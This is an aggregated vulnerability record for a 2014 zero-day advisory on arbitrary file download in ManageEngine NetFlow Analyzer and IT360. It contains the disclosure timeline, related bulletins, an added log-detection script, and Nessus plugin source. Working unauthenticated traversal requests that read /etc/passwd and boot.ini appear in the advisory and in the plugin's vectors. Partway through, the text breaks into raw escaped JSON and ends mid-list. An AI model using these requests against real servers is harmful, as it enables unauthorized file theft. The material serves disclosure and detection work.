ID: PACKETSTORM:129336
Type: packetstorm
Reporter: Pedro Ribeiro
Modified: 2014-12-01T00:00:00
Description
`Hi,
This is part 9 of the ManageOwnage series. For previous parts see [1].
Today we have yet another 0 day - an arbitrary file download
vulnerability that can be exploited unauthenticated in NetFlow Analyzer
and authenticated in IT360.
I'm releasing this as a 0 day because ManageEngine have been making a
fool out of me for 105 days. I have asked them "are you releasing a
fix soon?" at least a couple of times every month to which they always
responded "yes we will release in the next week/month". And then they
don't release the fix nor provide an explanation. See the advisory
timeline below for details.
A Metasploit auxiliary module that exploits this vulnerability has
been submitted to the Metasploit Framework GitHub repo in [2].
A full copy of the advisory below can be obtained from my repo in [3].
Regards,
Pedro
>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 30/11/2014 / Last updated: 30/11/2014
>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow
technologies to provide real time visibility into the network
bandwidth performance. NetFlow Analyzer, primarily a bandwidth
monitoring tool, has been optimizing thousands of networks across the
World by giving holistic view about their network bandwidth and
traffic patterns. NetFlow Analyzer is a unified solution that
collects, analyzes and reports about what your network bandwidth is
being used for and by whom."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
This is being released as a 0-day because ManageEngine have been
twiddling their thumbs (and making a fool out of me) for 105 days. See
timeline below for explanation.
>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above
CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true
CVE-2014-5446:
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
All 3 servlets can be exploited in both Windows and Linux. A
Metasploit module that exploits CVE-2014-5445 has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.
Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.
19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded
with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to
exploit them and their impact.
22/08/2014
- Requested information regarding the release date for the fix.
Received response "We do not have a ETA on this, I will check with our
engineering team and update you."
22/09/2014
- Requested information regarding the release date for the fix.
Received response "We expect that the new release will be within the
next couple of weeks".
20/10/2014
- Requested information regarding the release date for the fix.
Received response "Our new release will be happening early by next
week, you can get the update in our NetFlow Analyzer website".
- Asked if they are sure that the fix will be included in the new
release. Received response "yes you are correct, the issue that you
have specified is fixed in new release".
27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a
fix soon. Received response "We will release the PPM file of the
upgrade soon, in which we have fixed the Vulnerability you mentioned".
5/11/2014
- Requested information regarding the release date for the fix.
Received response "You can expect the release before this month end".
28/11/2014
- Requested information regarding the release date for the fix.
Received response "The PPM file is in testing phase and will be
released in next Month".
- Asked if they can commit to a date. Received response "the ppm is in
testing phase now, as it is one of the major release, we will not be
able to give an exact date of release".
30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and
immediately released advisory and exploit.
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
[2]
https://github.com/rapid7/metasploit-framework/pull/4282
[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt
`
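Added example, not part of the original advisory: a log check for the three servlet requests listed under "Technical details". It assumes common/combined-format access logs and that legitimate `schFilePath` and `filename` values are plain relative names; the sample log lines and the names `WATCHED`, `classify_path`, `inspect_line` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Servlet name (lower-cased) -> (file-path parameter, CVE), as listed in the advisory.
WATCHED = {
    "csvservlet": ("schfilepath", "CVE-2014-5445"),
    "creportpdfservlet": ("schfilepath", "CVE-2014-5445"),
    "displaychartpdf": ("filename", "CVE-2014-5446"),
}

# Common/combined access-log layout (assumption about the deployment's log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_fully(value, max_rounds=4):
    """Percent-decode until stable so nested encodings normalise to one form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_path(value):
    """Return why a parameter value looks like a file-system path, or None.

    Assumption: legitimate values are plain relative names, so any traversal
    segment, drive letter or leading slash is worth an alert.
    """
    norm = decode_fully(value).replace("\\", "/")
    if ".." in norm.split("/"):
        return "traversal"
    if re.match(r"[A-Za-z]:", norm):
        return "drive-letter path"
    if norm.startswith("/"):
        return "absolute path"
    return None


def inspect_line(line):
    """Return a finding dict for one access-log line, or None if it is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Last path segment, ignoring ";jsessionid=..." style path parameters.
    servlet = unquote(path).split(";")[0].rstrip("/").rsplit("/", 1)[-1].lower()
    if servlet not in WATCHED:
        return None
    param, cve = WATCHED[servlet]
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() != param:
            continue
        reason = classify_path(value)
        if reason:
            return {
                "ip": m.group("ip"),
                "servlet": servlet,
                "cve": cve,
                "value": decode_fully(value),
                "reason": reason,
                # A 200 suggests the servlet returned content for the request.
                "served": m.group("status") == "200",
            }
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log (documentation IP ranges, invented timestamps and sizes).
SAMPLE_LOG = r'''192.0.2.10 - - [01/Dec/2014:10:00:01 +0000] "GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd HTTP/1.1" 200 1432
192.0.2.10 - - [01/Dec/2014:10:00:03 +0000] "GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true HTTP/1.1" 200 211
203.0.113.5 - - [01/Dec/2014:10:01:10 +0000] "GET /netflow/index.jsp HTTP/1.1" 200 8120
198.51.100.7 - - [01/Dec/2014:10:02:44 +0000] "GET /netflow/servlet/DisplayChartPDF?filename=..%2f..%2f..%2f..%2fboot.ini HTTP/1.1" 404 0
203.0.113.5 - - [01/Dec/2014:10:03:00 +0000] "GET /netflow/servlet/DisplayChartPDF?filename=report_2014.pdf HTTP/1.1" 200 50312
198.51.100.7 - - [01/Dec/2014:10:03:30 +0000] "GET /netflow/servlet/DisplayChartPDF?filename=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0'''

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

Findings with `served` set are the ones to triage first, since the response status indicates the request was answered rather than rejected.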
Title: ManageEngine Netflow Analyzer / IT360 File Download
Bulletin family: exploit
Published: 2014-12-01T00:00:00
CVSS: 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/)
CVE list: CVE-2014-5446, CVE-2014-5445
Href: https://packetstormsecurity.com/files/129336/ManageEngine-Netflow-Analyzer-IT360-File-Download.html
Source: https://packetstormsecurity.com/files/download/129336/manageengine-filedownload.txt
References:
- checkpoint_advisories: CPAI-2014-2308, CPAI-2014-2341
- cve: CVE-2014-5445, CVE-2014-5446
- exploitdb: EDB-ID:43895
- exploitpack: EXPLOITPACK:930FC2F9BB7DBE4909B00213945A3C4A
- metasploit: MSF:AUXILIARY/ADMIN/HTTP/NETFLOW_FILE_DOWNLOAD
- nessus: MANAGEENGINE_NETFLOW_CVE-2014-5446.NASL
- securityvulns: SECURITYVULNS:DOC:31473, SECURITYVULNS:VULN:14133
- zdi: ZDI-15-138
- zdt: 1337DAY-ID-22955, 1337DAY-ID-29645
Related bulletins

zdt 1337DAY-ID-22955
Title: ManageEngine Netflow Analyzer / IT360 File Download Vulnerability
Published: 2014-12-02
Description: ManageEngine Netflow Analyzer and IT360 suffer from an arbitrary file download vulnerability.
CVSS: 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/)
Href: https://0day.today/exploit/description/22955
Source: https://0day.today/exploit/22955
Text: copy of the advisory above.

zdt 1337DAY-ID-29645
Title: ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download Vulnerability
Published: 2018-01-26
Description: Exploit for multiple platform in category web applications
CVSS: 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/)
Href: https://0day.today/exploit/description/29645
Source: https://0day.today/exploit/29645
Text: copy of the advisory above, with these lines changed:
Disclosure: 30/11/2014 / Last updated: 3/12/2014
Affected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above

exploitpack EXPLOITPACK:930FC2F9BB7DBE4909B00213945A3C4A
Title: ManageEngine Netflow Analyzer IT360 - Arbitrary File Download
Published: 2014-12-03
CVSS: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Text: copy of the advisory above, with the same two changed lines (Last updated: 3/12/2014; Affected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above).

zdi ZDI-15-138
Title: ManageEngine NetFlow Analyzer CReportPDFServlet schFilePath Information Disclosure Vulnerability
Published: 2015-04-15
CVSS: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Href: https://www.zerodayinitiative.com/advisories/ZDI-15-138/
Description: This vulnerability allows remote attackers to disclose files on vulnerable installations of ManageEngine NetFlow Analyzer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of input to the CReportPDFServlet servlet. The issue lies in the failure to perform any validation of the input filename. A remote attacker can exploit this vulnerability to disclose files from the system.

nessus MANAGEENGINE_NETFLOW_CVE-2014-5446.NASL
Title: ManageEngine NetFlow Analyzer Multiple Path Traversal and File Access
Published: 2015-03-16
Modified: 2022-04-11
CPE: cpe:/a:manageengine:netflow_analyzer
Href: https://www.tenable.com/plugins/nessus/81821
Description: ManageEngine NetFlow Analyzer prior to version 10 build 10250 is affected by the following directory traversal vulnerabilities :
- User input to the 'schFilePath' parameter to CVSServlet or CReportPDFServlet is not properly sanitized. A remote attacker, using a specially crafted request, can exploit this to gain access to files outside of a restricted path. (CVE-2014-5445)
- User input to the 'filename' parameter to servlet DisplayChartPDF is not properly sanitized. A remote attacker, using a specially crafted request, can exploit this to gain access to files outside of a restricted path. (CVE-2014-5446)
Plugin source:

    #%NASL_MIN_LEVEL 70300
    #
    # (C) Tenable Network Security, Inc.
    #

    include('deprecated_nasl_level.inc');
    include('compat.inc');

    if (description)
    {
      script_id(81821);
      script_version("1.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

      script_cve_id("CVE-2014-5445", "CVE-2014-5446");
      script_bugtraq_id(71404);

      script_name(english:"ManageEngine NetFlow Analyzer Multiple Path Traversal and File Access");

      script_set_attribute(attribute:"synopsis", value:
    "The remote web server is affected by directory traversal
    vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "ManageEngine NetFlow Analyzer prior to version 10 build 10250 is
    affected by the following directory traversal vulnerabilities :

      - User input to the 'schFilePath' parameter to CVSServlet
        or CReportPDFServlet is not properly sanitized. A remote
        attacker, using a specially crafted request, can exploit
        this to gain access to files outside of a restricted
        path. (CVE-2014-5445)

      - User input to the 'filename' parameter to servlet
        DisplayChartPDF is not properly sanitized. A remote
        attacker, using a specially crafted request, can exploit
        this to gain access to files outside of a restricted
        path. (CVE-2014-5446)");
      # https://packetstormsecurity.com/files/129336/ManageEngine-Netflow-Analyzer-IT360-File-Download.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9899d210");
      script_set_attribute(attribute:"see_also", value:"https://www.manageengine.com/products/netflow/service-packs.html");
      script_set_attribute(attribute:"solution", value:
    "Update to version 10 build 10250 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");

      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");

      script_set_attribute(attribute:"vuln_publication_date", value:"2014/11/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/01/23");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/16");

      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:manageengine:netflow_analyzer");
      script_set_attribute(attribute:"thorough_tests", value:"true");
      script_end_attributes();

      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");

      script_copyright(english:"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

      script_dependencies("manageengine_netflow_detect.nbin");
      script_require_keys("installed_sw/ManageEngine NetFlow Analyzer");
      script_require_ports("Services/www", 8080);

      exit(0);
    }


    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");


    app = "ManageEngine NetFlow Analyzer";
    get_install_count(app_name:app, exit_if_zero:TRUE);

    port = get_http_port(default:8080);

    install = get_single_install(
      app_name : app,
      port     : port
    );

    dir = install['path'];
    url = build_url(port:port,qs:dir);

    vectors = make_list(
      "DisplayChartPDF?filename=../../../../Windows/WindowsShell.Manifest",
      "DisplayChartPDF?filename=../../../../etc/passwd",
      "CReportPDFServlet?pdf=true&schFilePath=\Windows\WindowsShell.Manifest",
      "CReportPDFServlet?pdf=true&schFilePath=/etc/passwd",
      "CSVServlet?schFilePath=\Windows\WindowsShell.Manifest",
      "CSVServlet?schFilePath=/etc/passwd"
    );

    verify = make_list(
      "<description>Windows Shell</description>",
      "root:",
      "<description>Windows Shell</description>",
      "root:",
      "<description>Windows Shell</description>",
      "root:"
    );

    vurl = NULL;
    res = NULL;
    vuln = FALSE;
    for(v = 0; v < max_index(vectors); v++)
    {
      # We only try the first 2 tests unless thorough_tests is on
      if(v > 1 && !thorough_tests)
        break;

      item = dir+"netflow/servlet/"+vectors[v];
      vurl = build_url(port:port, qs:item);
      reg = verify[v];
      res = http_send_recv3(
        port         : port,
        method       : "GET",
        item         : item,
        exit_on_fail : TRUE
      );

      if("200 OK" >< res[0] && res[2] =~ reg)
      {
        vuln = TRUE;
        break;
      }
    }

    if(vuln)
    {

      file = "Windows\WindowsShell.Manifest";
      if("passwd" >< vurl)
        file = "/etc/passwd";

      security_report_v4(
        port     : port,
        file     : file,
        severity : SECURITY_WARNING,
        output   : res[2],
        request  : make_list(vurl)
      );
    }
exit(0);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:07:14", "bulletinFamily": "software", "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "description": "Directory traversal.", "edition": 2, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14133", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14133", "title": "NetFlow Analyzer security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "description": "\r\n\r\nHi,\r\n\r\nThis is part 9 of the ManageOwnage series. For previous parts see [1].\r\n\r\nToday we have yet another 0 day - an arbitrary file download\r\nvulnerability that can be exploited unauthenticated in NetFlow Analyzer\r\nand authenticated in IT360.\r\nI'm releasing this as a 0 day because ManageEngine have been making a\r\nfool out of me for 105 days. I have asked them "are you releasing a\r\nfix soon?" at least a couple of times every month to which they always\r\nresponded "yes we will release in the next week/month". And then they\r\ndon't release the fix nor provide an explanation. 
See the advisory\r\ntimeline below for details.\r\n\r\nA Metasploit auxiliary module that exploits this vulnerability has\r\nbeen submitted to the Metasploit Framework Github repo in [2].\r\n\r\nA full copy of the advisory below can be obtained from my repo in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 30/11/2014\r\n\r\n>> Background on the affected product:\r\n"NetFlow Analyzer, a complete traffic analytics tool, leverages flow\r\ntechnologies to provide real time visibility into the network\r\nbandwidth performance. NetFlow Analyzer, primarily a bandwidth\r\nmonitoring tool, has been optimizing thousands of networks across the\r\nWorld by giving holistic view about their network bandwidth and\r\ntraffic patterns. NetFlow Analyzer is a unified solution that\r\ncollects, analyzes and reports about what your network bandwidth is\r\nbeing used for and by whom."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\nThis is being released as a 0-day because ManageEngine have been\r\ntwiddling their thumbs (and making a fool out of me) for 105 days. 
See\r\ntimeline below for explanation.\r\n\r\n\r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above\r\n\r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true\r\n\r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n\r\nAll 3 servlets can be exploited in both Windows and Linux. A\r\nMetasploit module that exploits CVE-2014-5445 has been released.\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n\r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n\r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded\r\nwith the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to\r\nexploit them and their impact.\r\n\r\n22/08/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "We do not have a ETA on this, I will check with our\r\nengineering team and update you."\r\n\r\n22/09/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "We expect that the new release will be within the\r\nnext couple of weeks".\r\n\r\n20/10/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "Our new release will be happening early by next\r\nweek, you can get the update in our NetFlow Analyzer website".\r\n- Asked if they are sure that the fix will be included in the new\r\nrelease. 
Received response "yes you are correct, the issue that you\r\nhave specified is fixed in new release".\r\n\r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable.\r\n- Sent an email to ManageEngine asking if they are going to release a\r\nfix soon. Received response "We will release the PPM file of the\r\nupgrade soon, in which we have fixed the Vulnerability you mentioned".\r\n\r\n5/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "You can expect the release before this month end".\r\n\r\n28/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "The PPM file is in testing phase and will be\r\nreleased in next Month".\r\n- Asked if they can commit to a date. Received response "the ppm is in\r\ntesting phase now, as it is one of the major release, we will not be\r\nable to give an exact date of release".\r\n\r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and\r\nimmediately released advisory and exploit.\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\nhttp://seclists.org/fulldisclosure/2014/Nov/21\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4282\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31473", "title": "[The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360", "type": "securityvulns", "cvss": 
{"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:47", "description": "", "cvss3": {}, "published": "2014-12-03T00:00:00", "type": "exploitdb", "title": "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2014-5445", "2014-5446", "CVE-2014-5445", "CVE-2014-5446"], "modified": "2014-12-03T00:00:00", "id": "EDB-ID:43895", "href": "https://www.exploit-db.com/exploits/43895", "sourceData": ">> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 3/12/2014\r\n\r\n>> Background on the affected product:\r\n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. 
With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\nThis is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.\r\n\r\n\r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above\r\n\r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true\r\n\r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n\r\nAll 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.\r\n\r\n\r\n>> Fix: \r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n\r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n\r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.\r\n\r\n22/08/2014\r\n- Requested information regarding the release date for the fix. Received response \"We do not have a ETA on this, I will check with our engineering team and update you.\"\r\n\r\n22/09/2014\r\n- Requested information regarding the release date for the fix. 
Received response \"We expect that the new release will be within the next couple of weeks\".\r\n\r\n20/10/2014\r\n- Requested information regarding the release date for the fix. Received response \"Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website\".\r\n- Asked if they are sure that the fix will be included in the new release. Received response \"yes you are correct, the issue that you have specified is fixed in new release\".\r\n\r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable. \r\n- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response \"We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned\".\r\n\r\n5/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"You can expect the release before this month end\".\r\n\r\n28/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"The PPM file is in testing phase and will be released in next Month\".\r\n- Asked if they can commit to a date. Received response \"the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release\".\r\n\r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43895", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:44:55", "description": "Directory traversal vulnerability in the DisplayChartPDF servlet in ZOHO ManageEngine Netflow Analyzer 8.6 through 10.2 and IT360 10.3 allows remote attackers and remote authenticated users to read arbitrary files via a .. 
(dot dot) in the filename parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-5446", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5446"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.7", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.5", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.9", "cpe:/a:zohocorp:manageengine_netflow_analyzer:8.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.5", "cpe:/a:zohocorp:manageengine_netflow_analyzer:10.2", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:10.0", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.1", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.0", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.7", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-5446", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5446", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.0:beta:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.5:*:*:*:*:*:*:*", 
